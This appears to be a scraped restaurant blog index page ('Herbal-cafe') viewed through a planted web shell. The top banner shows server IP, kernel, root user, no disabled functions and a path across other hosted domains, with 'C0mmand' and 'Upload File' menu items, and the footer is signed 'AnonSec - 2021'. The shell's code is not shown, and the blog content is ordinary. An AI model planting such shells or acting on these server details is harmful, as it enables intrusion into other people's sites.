|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/shortable.org/../basistool.shop/../herbal-cafe.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Blog - Herbal-cafe</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
html {
scroll-behavior: smooth;
}
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="bg-white/90 backdrop-blur-md fixed w-full z-50 top-0 border-b border-gray-100">
<div class="max-w-screen-xl mx-auto px-6 py-2 flex items-center justify-between">
<a href="./" class="flex items-center space-x-4">
<div class="relative">
<div class="w-12 h-12 rounded-xl bg-gradient-to-br from-red-500 to-orange-600 flex items-center justify-center text-white font-black text-xl"></div>
<div class="absolute -bottom-2 -right-2 w-6 h-6 rounded-full bg-white flex items-center justify-center text-xs font-bold text-red-600">24/7</div>
</div>
<div class="flex flex-col">
<span class="text-xs uppercase tracking-[0.4em] text-gray-400">RESTAURANT</span>
<span class="text-2xl font-black text-gray-900">Herbal-cafe</span>
</div>
</a>
<div class="hidden md:flex items-center space-x-8">
</div>
<button data-collapse-toggle="navbar-16" type="button" class="md:hidden inline-flex items-center justify-center w-11 h-11 rounded-xl bg-gray-100 text-gray-600">
<svg class="w-6 h-6" fill="none" viewBox="0 0 24 24" stroke="currentColor">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16" />
</svg>
</button>
</div>
<div class="hidden bg-white" id="navbar-16">
<div class="px-6 pb-6 space-y-4">
<a href="/Home</a>
<a href="about-us.php" class="block text-gray-700 font-semibold">About</a>
<a href="blog/" class="block text-gray-700 font-semibold">Blog</a>
<a href="contact.php" class="block text-center px-5 py-3 rounded-lg bg-gradient-to-r from-red-600 to-orange-600 text-white font-semibold">Contact</a>
</div>
</div>
</nav>
<section class="bg-gray-50 py-16 min-h-screen">
<div class="max-w-screen-xl mx-auto px-4">
<div class="text-center mb-16">
<h1 class="text-5xl md:text-6xl font-black text-gray-900 mb-6">
<span class="bg-gradient-to-r from-red-600 to-orange-600 bg-clip-text text-transparent">Blog</span>
</h1>
<p class="text-xl text-gray-600 max-w-2xl mx-auto">Explore our curated collection of articles and insights</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-6">
<article class="group bg-white rounded-xl overflow-hidden shadow-md hover:shadow-2xl transition-all border border-gray-100">
<div class="relative h-48 overflow-hidden">
<img src="https://images.pexels.com/photos/262047/pexels-photo-262047.jpeg?auto=compress&cs=tinysrgb&h=650&w=940" alt="Community Subscription Tables" class="w-full h-full object-cover group-hover:scale-110 transition-transform duration-500">
<div class="absolute inset-0 bg-gradient-to-t from-black/70 to-transparent opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="absolute top-3 left-3">
<span class="px-2.5 py-1 bg-red-600 text-white text-xs font-bold rounded-full">Loyalty</span>
</div>
</div>
<div class="p-5">
<div class="text-xs text-gray-500 mb-2">
<span>May 13, 2026</span>
</div>
<h2 class="text-lg font-bold text-gray-900 mb-2 group-hover:text-red-600 transition-colors line-clamp-2">
<a href="/blog/community-subscription-tables/">Community Subscription Tables</a>
</h2>
<p class="text-gray-600 text-sm mb-4 leading-relaxed line-clamp-2">Community subscription tables bundle rotating dining experiences, giving neighbo...</p>
<a href="/blog/community-subscription-tables/" class="inline-flex items-center text-red-600 font-semibold text-sm hover:gap-2 transition-all">
Read
<i class="fas fa-arrow-right ml-1 group-hover:translate-x-1 transition-transform"></i>
</a>
</div>
</article>
<article class="group bg-white rounded-xl overflow-hidden shadow-md hover:shadow-2xl transition-all border border-gray-100">
<div class="relative h-48 overflow-hidden">
<img src="https://images.pexels.com/photos/3298634/pexels-photo-3298634.jpeg?auto=compress&cs=tinysrgb&h=650&w=940" alt="Chef Collective Innovation Hubs" class="w-full h-full object-cover group-hover:scale-110 transition-transform duration-500">
<div class="absolute inset-0 bg-gradient-to-t from-black/70 to-transparent opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="absolute top-3 left-3">
<span class="px-2.5 py-1 bg-red-600 text-white text-xs font-bold rounded-full">Innovation</span>
</div>
</div>
<div class="p-5">
<div class="text-xs text-gray-500 mb-2">
<span>May 12, 2026</span>
</div>
<h2 class="text-lg font-bold text-gray-900 mb-2 group-hover:text-red-600 transition-colors line-clamp-2">
<a href="/blog/chef-collective-innovation-hubs/">Chef Collective Innovation Hubs</a>
</h2>
<p class="text-gray-600 text-sm mb-4 leading-relaxed line-clamp-2">Chef collective innovation hubs let multi-brand restaurant groups prototype menu...</p>
<a href="/blog/chef-collective-innovation-hubs/" class="inline-flex items-center text-red-600 font-semibold text-sm hover:gap-2 transition-all">
Read
<i class="fas fa-arrow-right ml-1 group-hover:translate-x-1 transition-transform"></i>
</a>
</div>
</article>
<article class="group bg-white rounded-xl overflow-hidden shadow-md hover:shadow-2xl transition-all border border-gray-100">
<div class="relative h-48 overflow-hidden">
<img src="https://images.pexels.com/photos/5779787/pexels-photo-5779787.jpeg?auto=compress&cs=tinysrgb&h=650&w=940" alt="Mastering Restaurant Management: Strategies for Success and Growth" class="w-full h-full object-cover group-hover:scale-110 transition-transform duration-500">
<div class="absolute inset-0 bg-gradient-to-t from-black/70 to-transparent opacity-0 group-hover:opacity-100 transition-opacity"></div>
<div class="absolute top-3 left-3">
<span class="px-2.5 py-1 bg-red-600 text-white text-xs font-bold rounded-full">General</span>
</div>
</div>
<div class="p-5">
<div class="text-xs text-gray-500 mb-2">
<span>May 11, 2026</span>
</div>
<h2 class="text-lg font-bold text-gray-900 mb-2 group-hover:text-red-600 transition-colors line-clamp-2">
<a href="/blog/mastering-restaurant-management-strategies-for-success-and-growth/">Mastering Restaurant Management: Strategies for Success and Growth</a>
</h2>
<p class="text-gray-600 text-sm mb-4 leading-relaxed line-clamp-2">In the competitive world of restaurant management, staying ahead requires a blen...</p>
<a href="/blog/mastering-restaurant-management-strategies-for-success-and-growth/" class="inline-flex items-center text-red-600 font-semibold text-sm hover:gap-2 transition-all">
Read
<i class="fas fa-arrow-right ml-1 group-hover:translate-x-1 transition-transform"></i>
</a>
</div>
</article>
</div>
</div>
</section>
<footer class="bg-white py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="flex flex-col md:flex-row justify-between items-start mb-12 gap-8">
<div class="flex-1">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-12 h-12 bg-gradient-to-br from-red-500 to-orange-600 rounded-xl flex items-center justify-center shadow-md">
<span class="text-white font-bold text-xl">H</span>
</div>
<span class="text-2xl font-black text-gray-900">Herbal-cafe</span>
</a>
<p class="text-gray-600 mb-6 max-w-sm">Building the future with innovative solutions and dedicated service.</p>
<div class="flex space-x-3">
<a href="#" class="w-10 h-10 bg-red-50 hover:bg-red-600 hover:text-white text-red-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-10 h-10 bg-red-50 hover:bg-red-600 hover:text-white text-red-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-10 h-10 bg-red-50 hover:bg-red-600 hover:text-white text-red-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-10 h-10 bg-red-50 hover:bg-red-600 hover:text-white text-red-600 rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div class="grid grid-cols-2 md:grid-cols-4 gap-8 flex-1">
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Company</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="./" class="hover:text-redHome</a></li>
<li><a href="about-us.php" class="hover:text-red-600 transition-colors text-sm">About</a></li>
<li><a href="contact.php" class="hover:text-red-600 transition-colors text-sm">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Resources</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="blog/" class="hover:text-red-600 transition-colors text-sm">Blog</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Legal</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="privacy.php" class="hover:text-red-600 transition-colors text-sm">Privacy</a></li>
<li><a href="terms.php" class="hover:text-red-600 transition-colors text-sm">Terms</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold mb-4 text-gray-900 uppercase tracking-wider">Support</h3>
<ul class="space-y-2 text-gray-600">
<li><a href="contact.php" class="hover:text-red-600 transition-colors text-sm">Help Center</a></li>
<li><a href="disclaimer.php" class="hover:text-red-600 transition-colors text-sm">Disclaimer</a></li>
</ul>
</div>
</div>
</div>
<div class="border-t border-gray-200 pt-8">
<p class="text-gray-500 text-sm text-center">© 2026 Herbal-cafe. All rights reserved.</p>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function() {
const paginationLinks = document.querySelectorAll('a[href*="?page="]');
paginationLinks.forEach(link => {
link.addEventListener('click', function(e) {
window.scrollTo({
top: 0,
behavior: 'smooth'
});
});
});
});
window.addEventListener('load', function() {
if (window.location.search.includes('page=')) {
setTimeout(function() {
window.scrollTo({
top: 0,
behavior: 'smooth'
});
}, 100);
}
});
</script>
</body>
</html>
AnonSec - 2021